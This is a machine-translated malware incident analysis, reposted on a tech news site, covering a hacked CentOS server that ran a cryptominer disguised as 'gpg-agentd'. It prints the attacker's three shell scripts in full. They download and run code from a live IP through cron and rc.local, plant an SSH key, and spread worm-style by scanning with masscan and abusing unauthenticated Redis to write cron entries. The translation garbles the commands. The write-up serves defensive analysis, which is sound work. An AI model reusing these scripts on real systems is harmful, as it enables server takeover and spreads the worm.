Shulou(Shulou.com)06/02 Report--

As soon as I arrived at the office on Monday morning, I heard my colleague say that a server could not log in, and I didn't take it to heart. I continued to have breakfast to see if the currency had fallen again.

Soon the colleagues of the operation and maintenance staff also arrived, gasping for breath: we have a server frozen by Ali Yun, the reason: to send a malicious package to the outside world.

SSH connected for a while, was rejected, asked the default port 22 is blocked.

Let the colleagues of the operation and maintenance change the port, connect it immediately, and take a look at the login name: root, there are less than 8 bits of Xiaobai password, the heart is cold: was hacked!

Look for clues

Server system CentOS 6.x, deployed applications such as Nginx,Tomcat,Redis, first backed up the database locally, and then the Top command took a look at it. Two 99% processes with the same name are still running, called gpg-agentd.

Google GPG, and the result is that gpg-agent provided by GPG provides support for the SSH protocol, which greatly simplifies key management.

It looks like a serious program, but if you take a closer look at the process on the server, it is followed by a letter d, which is well disguised, reminiscent of all kinds of viruses on Windows that look like svchost.exe.

Continue to investigate:

Ps eho command-p 23374netstat-pan | grep 23374

Check the pid:23374 process startup path and network status, that is, to the directory in figure 1, where you have found the binary executable left by the hacker.

There are two more questions waiting for me:

How is the file uploaded?

What is the purpose of this file, or what does the hacker want?

History took a look, and sure enough, all the records were erased, leaving no trace. Continue with the command more messages:

I saw that around 12:00 in the morning, a lot of software was installed on the server, several of which caught my attention. I'll talk about it in more detail below.

Looking and guessing, if we want to do something bad, where will we do the article and start it automatically? Time to start? Yes, plan the task:

Crontab-e

Sure enough, the clue was found.

Motive to commit a crime

The above scheduled task means to download a script on the server every 15 minutes and execute the script.

Let's download the script and take a look:

Curl-fsSL 159.89.190.243/ash.php > ash.sh

The script reads as follows:

Uname-a

Id

Hostname

Setenforce 2 > / dev/null

Ulimit-n 50000

Ulimit-u 50000

Crontab-r 2 > / dev/null

Rm-rf / var/spool/cron/* 2 > / dev/null

Mkdir-p / var/spool/cron/crontabs 2 > / dev/null

Mkdir-p / root/.ssh 2 > / dev/null

Echo 'ssh-rsa

AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh4inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx

RedisX' > / root/.ssh/authorized_keys

Echo'* / 15 * curl-fsSL 159.89.190.243/ash.php | sh' > / var/spool/cron/root

Echo'* / 20 * curl-fsSL 159.89.190.243/ash.php | sh' > / var/spool/cron/crontabs/root

Yum install-y bash 2 > / dev/null

Apt install-y bash 2 > / dev/null

Apt-get install-y bash 2 > / dev/null

Bash-c 'curl-fsSL 159.89.190.243/bsh.php | bash' 2 > / dev/null

A rough analysis of the main purpose of the script: first, to turn off SELinux, lift the restrictions on Shell resource access, and then generate the SSH public key in the / root/.ssh/authorized_keys file.

In this way, every time a hacker logs in to this server, he can log in without a password, and it will be much more convenient to execute the script.

Next, install Bash, and finally continue to download the second script, bsh.php, and execute it. Continue to download and analyze bsh.pbp as follows:

Sleep $(seq 3 7 | sort-R | head-N1)

Cd / tmp | | cd / var/tmp

Sleep 1

Mkdir-p. ICE-unix/... & & chmod-R 777.ICE-unix & & cd. ICE-unix/...

Sleep 1

If [- f. Watch]; then

Rm-rf. Watch

Exit 0

Fi

Sleep 1

Echo 1 > .watch

Sleep 1

Ps x | awk'! / awk/ & / redisscan | ebscan | redis-cli/ {print $1}'| xargs kill-9 2 > / dev/null

Ps x | awk'! / awk/ & / barad_agent | masscan | .sr0 | clay | udevs | .sshd | xig/ {print $1}'| xargs kill-9 2 > / dev/null

Sleep 1

If! [- x / usr/bin/gpg-agentd]; then

Curl-s-o / usr/bin/gpg-agentd 159.89.190.243/dump.db

Echo'/ usr/bin/gpg-agentd' > / etc/rc.local

Echo 'curl-fsSL 159.89.190.243/ash.php | sh' > > / etc/rc.local

Echo 'exit 0' > > / etc/rc.local

Fi

Sleep 1

Chmod + x / usr/bin/gpg-agentd & & / usr/bin/gpg-agentd | | rm-rf / usr/bin/gpg-agentd

Sleep 1

If! [- x "$(command-v masscan)]; then

Rm-rf / var/lib/apt/lists/*

Rm-rf x1.tar.gz

If [- x "$(command-v apt-get)]; then

Export DEBIAN_FRONTEND=noninteractive

Apt-get update-y

Apt-get install-y debconf-doc

Apt-get install-y build-essential

Apt-get install-y libpcap0.8-dev libpcap0.8

Apt-get install-y libpcap*

Apt-get install-y make gcc git

Apt-get install-y redis-server

Apt-get install-y redis-tools

Apt-get install-y redis

Apt-get install-y iptables

Apt-get install-y wget curl

Fi

If [- x "$(command-v yum)]; then

Yum update-y

Yum install-y epel-release

Yum update-y

Yum install-y git iptables make gcc redis libpcap libpcap-devel

Yum install-y wget curl

Fi

Sleep 1

Curl-sL-o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz

Sleep 1

[- f x1.tar.gz] & & tar zxf x1.tar.gz & & cd masscan-1.0.4 & & make & & make install & & cd. & & rm-rf masscan-1.0.4

Fi

Sleep 3 & & rm-rf. Watch

Bash-c 'curl-fsSL 159.89.190.243/rsh.php | bash' 2 > / dev/null

The code for this script is long, but there are four main functions:

Download the remote code to the local, and add the execution permission, chmod Ubunx.

Modify the rc.local to allow the local code to boot and execute automatically.

Download the open source scanner code on Github and install the relevant dependency software, which is the record I saw in Messages above.

Download the third script and execute it.

I went to Github to see this open source code:

Transmitting 10 Million Packets Per Second (sending 10 million packets per second) is faster than nmap, which makes it easy to understand why Aliyun froze the server.

After probably taking a look at Readme, I didn't dig into it and went on to download the third script:

Setenforce 2 > / dev/null

Ulimit-n 50000

Ulimit-u 50000

Sleep 1

Iptables-I INPUT 1-p tcp-- dport 6379-j DROP 2 > / dev/null

Iptables-I INPUT 1-p tcp-- dport 6379-s 127.0.. 1-j ACCEPT 2 > / dev/null

Sleep 1

Rm-rf .dat .shard .ranges .lan 2 > / dev/null

Sleep 1

Echo 'config set dbfilename "backup.db"' > .dat

Echo 'save' > > .dat

Echo 'flushall' > > .dat

Echo 'set backup1 "* / 2 * curl-fsSL http://159.89.190.243/ash.php | sh

"'> .dat

Echo 'set backup2 "* / 3 * wget-Q-O-http://159.89.190.243/ash.php | sh

"'> .dat

Echo 'set backup3 "* / 4 * curl-fsSL http://159.89.190.243/ash.php | sh

"'> .dat

Echo 'set backup4 "* / 5 * wget-Q-O-http://159.89.190.243/ash.php | sh

"'> .dat

Echo 'config set dir "/ var/spool/cron/"' > .dat

Echo 'config set dbfilename "root" > .dat

Echo 'save' > > .dat

Echo 'config set dir "/ var/spool/cron/crontabs"' > .dat

Echo 'save' > > .dat

Sleep 1

Masscan-- max-rate 10000-p6379Power6380-- shard $(seq 1 22000 | sort-R | head-N1) / 22000-- exclude 255.255.255.255... / 2 > / dev/null | awk'{print $6, substr ($4,1, length ($4)-4)}'| sort | uniq > .shard

Sleep 1

While read-r h p; do

Cat .dat | redis-cli-h $h-p $p-- raw 2 > / dev/null 1 > / dev/null &

Done

< .shard sleep 1 masscan --max-rate 10000 -p6379,6380 192.168../16 172.16../16 116.62../16 116.232../16 116.128../16 116.163../16 2>

/ dev/null | awk'{print $6, substr ($4,1, length ($4)-4)}'| sort | uniq > .ranges

Sleep 1

While read-r h p; do

Cat .dat | redis-cli-h $h-p $p-- raw 2 > / dev/null 1 > / dev/null &

Done

< .ranges sleep 1 ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>

/ dev/null | sed's sed / ([0-9] {2}) / / 16 Universe g'> .inet

Sleep 1

Masscan-- max-rate 10000-p6379Power6380-iL .inet | awk'{print $6, substr ($4,1, length ($4)-4)}'| sort | uniq > .lan

Sleep 1

While read-r h p; do

Cat .dat | redis-cli-h $h-p $p-- raw 2 > / dev/null 1 > / dev/null &

Done

< .lan sleep 60 rm -rf .dat .shard .ranges .lan 2>

/ dev/null

If the first two scripts only download and execute binaries on the server, then this script really shows the power of the virus. Let's analyze the script.

There is nothing to say about modifying the system environment at the beginning, but the next file writing operation looks a little familiar. If you have used Redis, you should be able to guess that this is the configuration of Redis.

Writing this configuration naturally takes advantage of the loophole that Redis writes the cached content to the local file, and the result is to log in to the server that is written to the public key with the local private key, and you can log in without a password, which is / root/.ssh/authorized_keys at the beginning of our article.

After logging in, you begin to perform scheduled tasks and download scripts on a regular basis. All right, when the configuration file is ready, we start using Masscan to scan the Redis server throughout the network for broilers.

Note that 6379 is the default port of the Redis server. If the listening port of your Redis is public network IP or 0.0.0.0, and there is no password protection, sorry, you will be hit.

Summary

By analyzing these three scripts in turn, we can see the horror of the virus. First, we get login permissions by writing ssh public key, then download and execute remote binaries, and finally copy through Redis vulnerabilities, rapidly spreading throughout the network, growing at an exponential rate.

So the question is, how did this server get hit? Take a look at the address of redis.conf,Bind is 127.0.0.1, no problem.

It can be inferred that the Root account should have been violently cracked. In order to verify my idea, I took a look at it on Lastb, and sure enough, there are a large number of records:

There is one last question left, what exactly is this gpg-agentd program for? My first reaction at that time was mining machines, because now the digital currency is too hot, increasing the demand for distributed mining machines, which gives birth to this grey industrial chain.

So, drag the gpg-agentd into Ida, search for bitcoin,eth,mine and other related words with String, and finally find this:

Open nicehash.com and take a look, and everything is clear:

Safety recommendation

Server:

Disable ROOT

The user name and password are as complex as possible.

Modify the default port 22 of SSH

Install DenyHosts anti-brute force cracking software

Disable password login and log in using RSA public key

Redis:

Disable public network IP snooping, including 0.0.0.0

Use a password to restrict access to Redis

Run Redis with a lower privilege account

At this point, the whole intrusion process is basically analyzed, if you are interested in the sample, you can also go to Curl, or go to the virtual machine to execute the above script. In view of my limited ability, it is inevitable that there will be negligence or mistakes in the article.

The article comes from: watching the snow forum Hefe

Today's benefits:

2019 Linux Cloud Computing + Operation and maintenance Development Roadmap

Don't be afraid to delete the database! 2 hours to teach you to play enterprise database backup and restore

Https://pan.baidu.com/s/16DMOuvwOwD8biekriLao5Q

Link: https://pan.baidu.com/s/1kFiMox_vrUR3xyasvkJFlA extraction code: ha99

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.